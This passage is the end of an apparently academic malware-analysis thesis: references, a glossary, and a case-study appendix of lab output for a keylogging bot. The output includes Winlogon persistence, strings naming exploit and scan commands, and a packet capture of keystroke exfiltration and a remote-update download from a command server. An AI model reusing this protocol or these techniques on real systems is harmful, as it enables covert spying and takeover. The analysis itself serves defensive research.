Sherstobitoff, R. (2008, 05). Server-Side Polymorphism: Crime-Ware as a Service Model (CaaS). Retrieved 01 13, 2011, from http://pandasecurityus.files.wordpress.com: http://pandasecurityus.files.wordpress.com/2008/05/server-side-polymorphism.pdf

Skoudis, E. (2004). Malware: Fighting Malicious Code. Upper Saddle River, NJ: Prentice Hall PTR.

Spengler, B. (2011). grsecurity. Retrieved 02 01, 2011, from http://grsecurity.net/: http://grsecurity.net/

Street, J. E., & Nabors, K. (2010). Dissecting the Hack: The F0rb1dd3n Network. Amsterdam, Holland: Elsevier.

Swanson, W. (2003). The Art of Picking Intel Registers. Retrieved 01 11, 2011, from http://www.swansontec.com: http://www.swansontec.com/sregisters.html

Szor, P. (2005). The Art of Computer Virus Research and Defense. Upper Saddle River, NJ: Addison Wesley Professional. the PaX team. (n.d.). Documentation for the PaX project. Retrieved 02 01, 2011, from http://pax.grsecurity.ne: http://pax.grsecurity.net/docs/

US Army. (2010, 04 23). Information Assurance Fundamentals (IAF) Training. Lesson 6. Retrieved 01 15, 2011, from https://ia.signal.army.mil: https://ia.signal.army.mil/IAF/IASOLesson6.asp

Veracode. (2008, 03 13). Anti-Debugging: A Developers Viewpoint. Retrieved 01 03, 2011, from http://www.donkeyonawaffle.org: http://www.donkeyonawaffle.org/misc/Source_Boston_2009- Antidebugging-Dev-Release.pdf

VMware Inc. (2011). VMware. Retrieved 01 30, 2011, from http://www.vmware.com: http://www.vmware.com/

Volatile Systems, LLC . (2008). The Volatility Framework: Volatile memory artifact extraction utility framework. Retrieved 01 30, 2011, from https://www.volatilesystems.com: https://www.volatilesystems.com/default/volatility

Walenstein, A., Mathur, R., Chouchane, M. R., & Lakhoti, A. (2007). The Design Space of Metamorphic Malware. Lafayette, LA. (USA): http://www.cacs.louisiana.edu/labs/SRL/publications/2007-iciw- walenstein-mathur-chouchane-lakhotia.pdf.

Websense. (n.d.). Win32 Portable Executable Packing Uncovered. Retrieved 01 05, 2010, from http://www.woodmann.com: http://www.woodmann.com/collaborative/knowledge/images/Bin_Win32_Portable_Executable_Packin g_Uncovered_2010-2-6_16.27_HistoryofPackingTechnology.pdf

West-Brown, M. J., Stikvoort, D., Kossakowski, K.-P., Killcrece, G., Ruefle, R., & Zajicek, M. (2003, April 1). http://www.cert.org/archive/pdf/csirt-handbook.pdf. Retrieved 12 07, 2010, from http://www.cert.org/csirts/csirt_faq.html: http://www.cert.org/csirts/csirt_faq.html

Wismer, K. (2007, 08 10). What is server-side polymorphism? Retrieved 01 13, 2011, from http://anti- virus-rants.blogspot.com: http://anti-virus-rants.blogspot.com/2007/08/what-is-server-side- polymorphism.html

Xen.org. (2011). What is xen? Retrieved 01 30, 2011, from http://www.xen.org/: http://www.xen.org/ xinfiltrate. (n.d.). Vb6 Crypter Sources. Retrieved 01 15, 2011, from http://crypters.net: http://crypters.net/sources.html y0da. (2009, 09 30). LordPE . Retrieved 01 30, 2011, from http://www.woodmann.com: http://www.woodmann.com/collaborative/tools/index.php/LordPE

Yuschuk, O. (2010, 11 20). Ollydbg. Retrieved 01 30, 2011, from http://www.ollydbg.de/: http://www.ollydbg.de/

Zeltser, L. (2010, 10 11). 3 Phases of Malware Analysis: Behavioral, Code, and Memory Forensics. Retrieved 10 23, 2010, from http://blogs.sans.org: http://blogs.sans.org/computer- forensics/2010/10/11/3-phases-malware-analysis-behavioral-code-memory-forensics/

Zeltser, L. (2011, 01). 4 Steps to Combat Malware Enterprisewide. Retrieved 02 01, 2011, from http://campustechnology.imirus.com: http://campustechnology.imirus.com/Mpowered/book/vcampus11/i1/p50

Zhang, J. (2010). Improved Software Activation Using Multithreading. San Jose: San José State University.

Appendix A – Glossary

ASCII: or American Standard Code for Information Interchange, is a method for encoding data into computer and network compatible format.

Command and Control Server: A server located on a public network that receives communication from infected hosts and returns commands back to the infected systems.

C&C Server: see Command and Control Server

Crypter: A program designed to add runtime encryption to an executable file.

Exfiltrate: Removal data from within a trusted environment.

Honey Pot: A system connected to a network that is designed to draw attention from hackers, in a hope of collecting data about malicious activities.

ImageBase: Address where the PE image will be mapped in memory (unless there is a relocation).

Import Address Table (IAT): This is the table of libraries, containing required functions, that an executable must have available at runtime.

Original Entry Point (OEP): The address of the executable once it is loaded into memory. This address can be updated based on modifying sections. The program begins it execution at this location.

Obfuscate: To encode or otherwise hide information within seemingly random data patterns.

Promiscuous Mode: A function of a Network Interface Card (NIC) whereby it can listen and accept packets not only destined for itself.

Registry: The set of files in a Microsoft Windows system that hold the configuration and system settings

RFC: or Request For Comment, typically a document that describes a networking protocol or technology. These descriptions are generally accepted by all as the de facto definition of the thing being described.

Relative Virtual Address (RVA): This is an address relative to the ImageBase. It is like an offset relative to the ImageBase. It is not a file offsets, which is relative to the start of the file on disk.

Trojan Horse Program: A computer executable that looks legitimate but carries some type of malicious payload.

Appendix B – Case study findings

From investigation of malware that is known not to be armored

Installation Report: _imbi Generated by InCtrl5, version 1.0.0.0 Install program: C:\Documents and Settings\steve\Desktop\_imbi.exe 10/8/2010 3:57 PM

Contents

 Registry  Disk Contents  Ini Files  Text Files

Registry

Keys ignored: 0

 (none)

Values changed: 1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Userinit" Old type: REG_SZ New type: REG_SZ Old data: C:\WINDOWS\system32\userinit.exe, New data: (data too large: 513 bytes) To Contents

Disk contents

Drives tracked: 1

 c:\

Files added: 3 c:\WINDOWS\Prefetch\_IMBI.EXE-0C63A1AA.pf Date: 10/8/2010 3:57 PM Size: 9,180 bytes c:\WINDOWS\Prefetch\_JEDZ.EXE-1CE1D328.pf Date: 10/8/2010 3:57 PM Size: 8,452 bytes c:\WINDOWS\system32\_jedz.exe Date: 10/8/2010 3:56 PM Size: 77,824 bytes

Files changed: 2 c:\WINDOWS\system32\config\software Old date: 10/8/2010 3:39 PM New date: 10/8/2010 3:57 PM Old size: 8,388,608 bytes New size: 8,388,608 bytes c:\WINDOWS\system32\config\software.LOG Old date: 10/8/2010 3:57 PM New date: 10/8/2010 3:57 PM Old size: 20,480 bytes New size: 1,024 bytes To Contents

INI file

Ini files tracked: 4

 C:\boot.ini  c:\windows\control.ini  c:\windows\system.ini  c:\windows\win.ini

To Contents

Text file

Text files tracked: 2

 c:\windows\system32\autoexec.nt  c:\windows\system32\config.nt

To Contents

Figure 44 – Full output of Inctrl5

Processes: PID ParentPID User Path ------500 2012 WXPSP0:steve C:\WINDOWS\System32\_hohn.exe

Ports: Port PID Type Path ------

Explorer Dlls: DLL Path Company Name File Description ------No changes Found

IE Dlls: DLL Path Company Name File Description ------No changes Found

Loaded Drivers: Driver File Company Name Description ------

Monitored RegKeys Registry Key Value ------

Kernel31 Api Log

------***** Installing Hooks ***** 71ab4401 RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\WinSock2\Parameters) 71ab4c59 RegOpenKeyExA (Protocol_Catalog9) 71ab457f RegOpenKeyExA (00000004) 71ab4650 RegOpenKeyExA (Catalog_Entries) 71ab4952 RegOpenKeyExA (000000000001) 71ab4952 RegOpenKeyExA (000000000002) 71ab4952 RegOpenKeyExA (000000000003) 71ab4952 RegOpenKeyExA (000000000004) 71ab4952 RegOpenKeyExA (000000000005) 71ab4952 RegOpenKeyExA (000000000006) 71ab4952 RegOpenKeyExA (000000000007) 71ab4952 RegOpenKeyExA (000000000008) 71ab4952 RegOpenKeyExA (000000000009) 71ab4952 RegOpenKeyExA (000000000010) 71ab4952 RegOpenKeyExA (000000000011) 71ab1779 WaitForSingleObject(7a8,0) 71ab4e6d RegOpenKeyExA (NameSpace_Catalog5) 71ab4797 RegOpenKeyExA (Catalog_Entries) 71ab4efa RegOpenKeyExA (000000000001) 71ab4efa RegOpenKeyExA (000000000002) 71ab4efa RegOpenKeyExA (000000000003) 71ab1779 WaitForSingleObject(7a0,0) 71aa16bd RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\Winsock2\Parameters) 71aa157c GlobalAlloc() 77e802f3 ExitThread() 4083ad GetVersionExA() 405eda GetCommandLineA() 402c64 CreateMutex(0x3) 401d38 RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon) 401e2a Copy(C:\Documents and Settings\steve\Desktop\_imbi.exe- >C:\WINDOWS\System32\_hohn.exe) 77e6bc59 WriteFile(h=790) 401ef0 RegCreateKeyExA (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon,(null)) 401f14 RegSetValueExA (Userinit) 401f70 CreateProcessA((null),C:\WINDOWS\System32\_hohn.exe,0,(null)) 77e7d0b7 WaitForSingleObject(78c,64) 80

10001e25 LoadLibraryA(psapi.dll)=76bf0000 10001e66 GetCurrentProcessId()=2012 76bf1720 ReadProcessMemory(h=790) 76bf173f ReadProcessMemory(h=790) 76bf175d ReadProcessMemory(h=790) 76bf16af ReadProcessMemory(h=790) ***** Injecting C:\iDEFENSE\SysAnalyzer\api_log.dll into new process ***** OpenProcess Handle=790 ***** Remote Allocation base: 140000 ***** WriteProcessMemory=1 BufLen=23 BytesWritten:23 ***** LoadLibraryA=77e805d8 ***** CreateRemoteThread=794 401f89 ExitProcess() ***** Injected Process Terminated ***** 71ab1779 WaitForSingleObject(5c,0) 71ab1779 WaitForSingleObject(64,0) 402cbd LoadLibraryA(kernel32.dll)=77e60000 77ddad96 LoadLibraryA(Secur32.dll)=76f90000 4053b4 GetSystemTime() 401019 socket(family=2,type=1,proto=0) 71ab52c6 LoadLibraryA(C:\WINDOWS\system32\mswsock.dll)=71a50000 71a5716a LoadLibraryA(C:\WINDOWS\system32\mswsock.dll)=71a50000 71aa14eb GlobalAlloc() 4010ad connect( 172.16.5.180:80 ) 402e40 send(h=84) 402f4d recv(h=84) 402f6d closesocket(84)

DirwatchData

------WatchDir Initilized OK Watching C:\DOCUME~1\steve\LOCALS~1\Temp Watching C:\WINDOWS Watching C:\Program Files Created: C:\WINDOWS\system32\_hohn.exe Modifed: C:\WINDOWS\system32\_hohn.exe Modifed: C:\WINDOWS\system32 Modifed: C:\WINDOWS\Prefetch Created: C:\WINDOWS\Prefetch\_IMBI.EXE-0C63A1AA.pf Modifed: C:\WINDOWS\Prefetch\_IMBI.EXE-0C63A1AA.pf Created: C:\DOCUME~1\steve\LOCALS~1\Temp\JETDB44.tmp Created: C:\DOCUME~1\steve\LOCALS~1\Temp\JET3.tmp Deteled: C:\DOCUME~1\steve\LOCALS~1\Temp\JET3.tmp Modifed: C:\WINDOWS\system32\config\SECURITY.LOG Deteled: C:\DOCUME~1\steve\LOCALS~1\Temp\JETDB44.tmp File: _hohn.exe Size: 77824 Bytes MD5: A53B7B732C2F3189B5F4BBE31C459EB9 Packer: File not found C:\iDEFENSE\SysAnalyzer\peid.exe

File Properties: CompanyName FileDescription FileVersion InternalName LegalCopyright OriginalFilename ProductName ProductVersion

RegKeys ------SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon

ExeRefs ------File: _hohn_dmp.exe_ C:\WINDOWS\system32\userinit.exe .exe C:\WINDOWS\System32\_hohn.exe

Raw Strings: ------File: _hohn_dmp.exe_ MD5: 82c454488ec8bcd138b7b881523b73c0 Size: 81922

Ascii Strings: ------!This program cannot be run in DOS mode. RichRW .text `.rdata @.data jhhH j|h` Ph~f hXMV hXMV YYh( SUVW _^][ GIt# t&:a tzVS GIt% t/Ku ^[_3 ^_[] SVWUj ]_^[ t.;t$$t( VC20XC00U SVWU tEVU t3x< ]_^[ XSVW _WPS HHtpHHtl RPWV ^_[3 Vt6P SUVW _^][ ~&WP SVW3 X_[^ QQSV btHHt. SUV3 _^][ YYj0[ <]t_G<-uA ]t6G: YY9u >%uM <"u% F<"t t9UW ?=t"U QQS3 PSSW 8"uD 8"uF@ 8"u, @@f9 @@f9 SS@SSPVSS t#SSUP t$$VSS _^][YY DSUVWh _^][ 8MZu t>j,P Yt0@ ^VhD PVh@ VWss Yu!j 5$*A QSUVW3 -8)A h@)A :uNFV >:u#FV _^][Y SVW3 9=8)A Qf9= WQPWS ,f9= WWWj WWSj WWWj %t,A %x,A uiSj =l,A uY;] pD#U j #M j?^; %t,A 5|,A X_^[ SUVWu _^][ 950%A QQSV 50%A 6;50%A 50%A =0%A sN;E u%C@ 5,*A Yt4^ ^;54%A t-Ht!Ht 5t.; ~*9E 5$*A 5$*A Y;5@*A 90tr 5@*A Wj@Y3 5@*A t7SW 5d,A 5@*A 5@*A 5d,A 5@*A 5d,A @AA; u,9E VWuBh ;54%A u?Vj =,*A <8=u @}>j 9=8*A uFWWj [ShD "WWSh@ 9} u E WW tMWWS t@9} VSh 5@*A 5d,A 82

QSUV WWWWj t/WWUPj _^][Y 0SVW _u@W PWPSS =<*A PWPSS 9] u tySS t-VW QQSVW3 tUj= t@9u uT9} 8<=t ^][_ SVWu =,*A ;54%A =,*A =,*A =\*A vPG!v vMN v (8PX 700WP `h```` ppxxxx (null) __GLOBAL_HEAP_SELECTED __MSVCRT_HEAP_SELECT runtime error TLOSS error SING error DOMAIN error R6028 - unable to initialize heap R6027 - not enough space for lowio initialization - not enough space for stdio initialization R6025 - pure virtual function call R6024 - not enough space for _onexit/atexit table R6019 - unable to open console device R6018 - unexpected heap error R6017 - unexpected multithread lock error R6016 - not enough space for thread data abnormal program termination R6009 - not enough space for environment R6008 - not enough space for arguments R6002 - floating point not loaded Microsoft Visual C++ Runtime Library Runtime Error! Program: SunMonTueWedThuFriSat JanFebMarAprMayJunJulAugSepOctNovDec GetLastActivePopup GetActiveWindow MessageBoxA user32.dll IsDebuggerPresent CloseHandle WriteFile CreateFileA ExitProcess CreateProcessA Sleep CopyFileA GetSystemDirectoryA GetModuleFileNameA GetModuleHandleA TerminateThread CreateThread GetLocalTime TerminateProcess OpenProcess Process32Next Process32First CreateToolhelp32Snapshot GetProcAddress 83

LoadLibraryA GetLastError CreateMutexA GetTickCount GetVersionExA GetComputerNameA GetSystemInfo KERNEL32.dll GetAsyncKeyState GetKeyState GetWindowTextA GetForegroundWindow USER32.dll GetUserNameA RegCloseKey RegSetValueExA RegCreateKeyExA RegQueryValueExA RegOpenKeyExA ADVAPI32.dll InternetCloseHandle InternetReadFile InternetOpenUrlA InternetOpenA WININET.dll WS2_32.dll GetCurrentProcess GetTimeZoneInformation GetSystemTime RtlUnwind GetStartupInfoA GetCommandLineA GetVersion HeapFree UnhandledExceptionFilter FreeEnvironmentStringsA FreeEnvironmentStringsW WideCharToMultiByte GetEnvironmentStrings GetEnvironmentStringsW SetHandleCount GetStdHandle GetFileType GetEnvironmentVariableA HeapDestroy HeapCreate VirtualFree MultiByteToWideChar GetStringTypeA GetStringTypeW SetFilePointer HeapAlloc VirtualAlloc HeapReAlloc SetStdHandle FlushFileBuffers ReadFile GetCPInfo GetACP GetOEMCP SetEndOfFile LCMapStringA LCMapStringW CompareStringA CompareStringW SetEnvironmentVariableA %02x%02x %s%s %s\_%s%s %s%s, %s%s|%d|OK 84

[EC] [EC] [F1] [F1] [F2] [F2] [F3] [F3] [F4] [F4] [F5] [F5] [F6] [F6] [F7] [F7] [F8] [F8] [F9] [F9] [10] [10] [11] [11] [12] [12] [TB] [TB] [CL] [CL] [WN] [WN] [WN] [WN] [PS] [PS] [SL] [SL] [IN] [IN] [HM] [HM] [PP] [PP] [DL] [DL] [EN] [EN] [PD] [PD] [LF] [LF] [UP] [UP] [RT] [RT] [DN] [DN] [NL] [NL] [%d-%d-%d %d:%d:%d] %s %s%s%s) %s%s(%s) %s%s%s) %s%s|%d|%d%s %s%s|%d|%d%s %d+-+%s\ %s%s|%d|%s %s%s|%d|OK 0.0.176 armorbot get /cgi-bin/a?a= join SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon Userinit C:\WINDOWS\system32\userinit.exe idle 172.16.5.180 kernel32.dll RegisterServiceProcess SLEEPING VERSION KEYLOGDATA PROCESSLIST error+opening+ +over+port+ +OPEN+on+ Content-Length: InetURL/1.0 keyLogger+already+started keyLogger+failed+to+start+thread keyLogger+started keyLogger+turned+off keylogger.dat (Changed Windows: (Buffer full) (Return) ( _killed| _not_killed| .exe failed OS:98,IP: OS:ME,IP: OS:2000,IP: OS:XP,Processor: OS:version: _SYSNAME:_ ,Processor: OS: 95 OS: NT ipc$ 85

version processes kill scan keylog update ms03_026 ms04_011 sleep upload Host: SCANDATA %s%s|%d|%s| %s%s|%d|%s| %s%s|%d| MARB MEOW MEOW( MEOW ~'?bB 41Qk 2{d_ WvWy l4u`3 YZqvgff SMBr PC NETWORK PROGRAM 1.0 LANMAN1.0 Windows for Workgrou ps 3.1a LM1.2X002 LANMAN2.1 NT LM 0.12 SMBs NTLMSSP SMBs NTLMSSP SMBu ????? SMB% SMB% SMB/ SMB% \\%s\%s %d.%d.%d.%d %s%s%s%d %s%s|%d|%s %s%d%s%s %s%s|%d|%s %s%s|%d|OK %s%s%s%d %s%s|%d|%s %s%d%s%s %s%s|%d|%s %s%s|%d|OK %s%s%s%d %s%s|%d|%s %s%d%s%s %s%s|%d|%s %s%s|%d|OK %s%s|%d|%d %s%d.%d.%d.%d %s%d.%d.%d.%d %s%d.%d.%d.%d %s%u:%d.%d.%d.%d%s%s %s%d.%d%s%u:%d.%d.%d.%d%s%s %s\_%s%s %s,%s %s%s|%d|%s %s%s|%d|%s_%s|%s Pacific Standard Time 86

Pacific Daylight Time C:\WINDOWS\System32\_hohn.exe abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ

Unicode Strings: ------jjjj jjjj (null) \\\C$\123456111111111111111.doc FXNBFXFXNBFXFXFXFX Windows 2000 2195 Windows 2000 5.0 Windows 2000 2195 Windows 2000 5.0 \\192.168.1.210\IPC$ \lsarpc \PIPE\ \PIPE\ \PIPE\ ((((( H Pacific Standard Time Pacific Daylight Time

Figure 45 – Full output of SysAnalyzer

Script started on Tue Jan 25 15:08:58 2011 sh-3.2# pwd /opt/local/bin sh-3.2# ./b ngrep -d en1 port 80 interface: en1 (192.168.0.0/255.255.255.0) filter: (ip) and ( port 80 ) ### T 192.168.0.125:1069 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1069 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=join|843|steve|.. ## T 172.16.5.180:80 -> 192.168.0.125:1069 [AP] |ack|843| ## T 192.168.0.125:1069 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1069 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1070 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1070 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=idle|843|.. ## T 172.16.5.180:80 -> 192.168.0.125:1070 [AP] |version|843| ## T 192.168.0.125:1070 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1070 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1071 -> 172.16.5.180:80 [A] FHEPF # 87

T 192.168.0.125:1071 -> 172.16.5.180:80 [AF] FHEPF ### T 192.168.0.125:1071 -> 172.16.5.180:80 [A] FHEPF ## T 192.168.0.125:1072 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1072 -> 172.16.5.180:80 [AP] get /cgi- bin/a?a=VERSION|843|armorbot_0.0.156|OS:version:586:192.168.0.125_ SYSNAME:_WXPSP0... # T 192.168.0.125:1072 -> 172.16.5.180:80 [AF] ...... ## T 172.16.5.180:80 -> 192.168.0.125:1072 [AP] |ack|843| # T 192.168.0.125:1072 -> 172.16.5.180:80 [R] get /c ## T 192.168.0.125:1072 -> 172.16.5.180:80 [R] ...... ### T 192.168.0.125:1073 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1073 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=idle|843|.. ## T 172.16.5.180:80 -> 192.168.0.125:1073 [AP] |keylog|843|on| ## T 192.168.0.125:1073 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1073 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1074 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1074 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=KEYLOGDATA|843|OK.. # T 192.168.0.125:1074 -> 172.16.5.180:80 [AF] ...... ## T 172.16.5.180:80 -> 192.168.0.125:1074 [AP] |ack|843| # T 192.168.0.125:1074 -> 172.16.5.180:80 [R] ...... ## T 192.168.0.125:1074 -> 172.16.5.180:80 [R] ...... ### T 192.168.0.125:1075 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1075 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=idle|843|.. ## T 172.16.5.180:80 -> 192.168.0.125:1075 [AP] |sleep|843|360| ## T 192.168.0.125:1075 -> 172.16.5.180:80 [A] ...... # 88

T 192.168.0.125:1075 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1076 -> 172.16.5.180:80 [A] .100.0 # T 192.168.0.125:1076 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=SLEEPING|843|360.. # T 192.168.0.125:1076 -> 172.16.5.180:80 [AF] CKAAA ## T 172.16.5.180:80 -> 192.168.0.125:1076 [AP] # T 192.168.0.125:1076 -> 172.16.5.180:80 [R] CKAAA ## T 192.168.0.125:1076 -> 172.16.5.180:80 [R] .....S ### T 192.168.0.125:1077 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1077 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=idle|843|.. ## T 172.16.5.180:80 -> 192.168.0.125:1077 [AP] |keylog|843|upload| ## T 192.168.0.125:1077 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1077 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1078 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1078 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=KEYLOGDATA|843|[1-22- 2011+11:46:28]++(Changed+Windows:+).. . # T 192.168.0.125:1078 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1079 -> 172.16.5.180:80 [A] ...... # T 172.16.5.180:80 -> 192.168.0.125:1078 [AP] |ack|843| # T 192.168.0.125:1078 -> 172.16.5.180:80 [R] ...... ## T 192.168.0.125:1078 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1079 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=KEYLOGDATA|843|[1-22- 2011+11:46:28]++(Changed+Windows:+C:\ WINDOWS\System32\cmd.exe)... # T 192.168.0.125:1079 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1080 -> 172.16.5.180:80 [A] ...... # T 172.16.5.180:80 -> 192.168.0.125:1079 [AP] 89

|ack|843| ## T 192.168.0.125:1079 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1079 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1080 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=KEYLOGDATA|843|[1-22- 2011+11:46:32]+cd+\+(Return)+(C:\WIND OWS\System32\cmd.exe)... # T 192.168.0.125:1080 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1081 -> 172.16.5.180:80 [A] ...... # T 172.16.5.180:80 -> 192.168.0.125:1080 [AP] |ack|843| ## T 192.168.0.125:1080 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1080 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1081 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=KEYLOGDATA|843|[1-22- 2011+11:46:33]+dir+(Return)+(C:\WINDO WS\System32\cmd.exe)... # T 192.168.0.125:1081 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1082 -> 172.16.5.180:80 [A] ...... # T 172.16.5.180:80 -> 192.168.0.125:1081 [AP] |ack|843| ## T 192.168.0.125:1081 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1081 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1082 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=KEYLOGDATA|843|[1-22- 2011+11:46:39]++(Changed+Windows:+Sta rt+Menu)... # T 192.168.0.125:1082 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1083 -> 172.16.5.180:80 [A] ...... # T 172.16.5.180:80 -> 192.168.0.125:1082 [AP] |ack|843| # T 192.168.0.125:1082 -> 172.16.5.180:80 [R] ...... ## T 192.168.0.125:1082 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1083 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=KEYLOGDATA|843|[1-22- 2011+11:46:42]++(Changed+Windows:+Win 90

dows+Explorer)... # T 192.168.0.125:1083 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1084 -> 172.16.5.180:80 [A] FHFIF # T 172.16.5.180:80 -> 192.168.0.125:1083 [AP] |ack|843| # T 192.168.0.125:1083 -> 172.16.5.180:80 [R] FHFIF ## T 192.168.0.125:1083 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1084 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=KEYLOGDATA|843|[1-22- 2011+11:52:10]++(Changed+Windows:+TCP View+-+Sysinternals:+www.sysinternals.com)... # T 192.168.0.125:1084 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1085 -> 172.16.5.180:80 [A] ...... # T 172.16.5.180:80 -> 192.168.0.125:1084 [AP] |ack|843| # T 192.168.0.125:1084 -> 172.16.5.180:80 [R] ...... ## T 192.168.0.125:1084 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1085 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=KEYLOGDATA|843|[1-22- 2011+11:52:13]++(Changed+Windows:+).. . # T 192.168.0.125:1085 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1086 -> 172.16.5.180:80 [A] ...... # T 172.16.5.180:80 -> 192.168.0.125:1085 [AP] |ack|843| # T 192.168.0.125:1085 -> 172.16.5.180:80 [R] ...... ## T 192.168.0.125:1085 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1086 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=KEYLOGDATA|843|[1-22- 2011+11:52:13]++(Changed+Windows:+Pro cess+Explorer+-+Sysinternals:+www.sysinternals.com+[WXPS)... # T 192.168.0.125:1086 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1087 -> 172.16.5.180:80 [A] ...... # T 172.16.5.180:80 -> 192.168.0.125:1086 [AP] |ack|843| # 91

T 192.168.0.125:1086 -> 172.16.5.180:80 [R] ...... ## T 192.168.0.125:1086 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1087 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=KEYLOGDATA|843|[1-22- 2011+11:52:39]++(Changed+Windows:+TCP View+-+Sysinternals:+www.sysinternals.com)... # T 192.168.0.125:1087 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1088 -> 172.16.5.180:80 [A] ...... # T 172.16.5.180:80 -> 192.168.0.125:1087 [AP] |ack|843| ## T 192.168.0.125:1087 -> 172.16.5.180:80 [R] get /c # T 192.168.0.125:1087 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1088 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=KEYLOGDATA|843|[1-22- 2011+11:53:36]++(Changed+Windows:+Pro cess+Explorer+-+Sysinternals:+www.sysinternals.com+[WXPS)... # T 192.168.0.125:1088 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1089 -> 172.16.5.180:80 [A] get /c # T 172.16.5.180:80 -> 192.168.0.125:1088 [AP] |ack|843| ## T 192.168.0.125:1088 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1088 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1089 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=KEYLOGDATA|843|[1-22- 2011+11:53:43]++(Changed+Windows:+TCP View+-+Sysinternals:+www.sysinternals.com)... # T 192.168.0.125:1089 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1090 -> 172.16.5.180:80 [A] get /c # T 172.16.5.180:80 -> 192.168.0.125:1089 [AP] |ack|843| # T 192.168.0.125:1089 -> 172.16.5.180:80 [R] ...... ## T 192.168.0.125:1089 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1090 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=KEYLOGDATA|843|[1-22- 2011+11:53:53]++(Changed+Windows:+Pro cess+Explorer+-+Sysinternals:+www.sysinternals.com+[WXPS)... # 92

T 192.168.0.125:1090 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1091 -> 172.16.5.180:80 [A] get /c # T 172.16.5.180:80 -> 192.168.0.125:1090 [AP] |ack|843| ## T 192.168.0.125:1090 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1090 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1091 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=KEYLOGDATA|843|OK.. # T 192.168.0.125:1091 -> 172.16.5.180:80 [AF] ...... ## T 172.16.5.180:80 -> 192.168.0.125:1091 [AP] |ack|843| ## T 192.168.0.125:1091 -> 172.16.5.180:80 [R] ...... # T 192.168.0.125:1091 -> 172.16.5.180:80 [R] get /c ### T 192.168.0.125:1092 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1092 -> 172.16.5.180:80 [AP] get /cgi-bin/a?a=idle|843|.. ## T 172.16.5.180:80 -> 192.168.0.125:1092 [AP] |update|843|http://172.16.5.180/newversion.exe| ## T 192.168.0.125:1092 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1092 -> 172.16.5.180:80 [AF] ...... #### T 192.168.0.125:1093 -> 172.16.5.180:80 [A] ...... # T 192.168.0.125:1093 -> 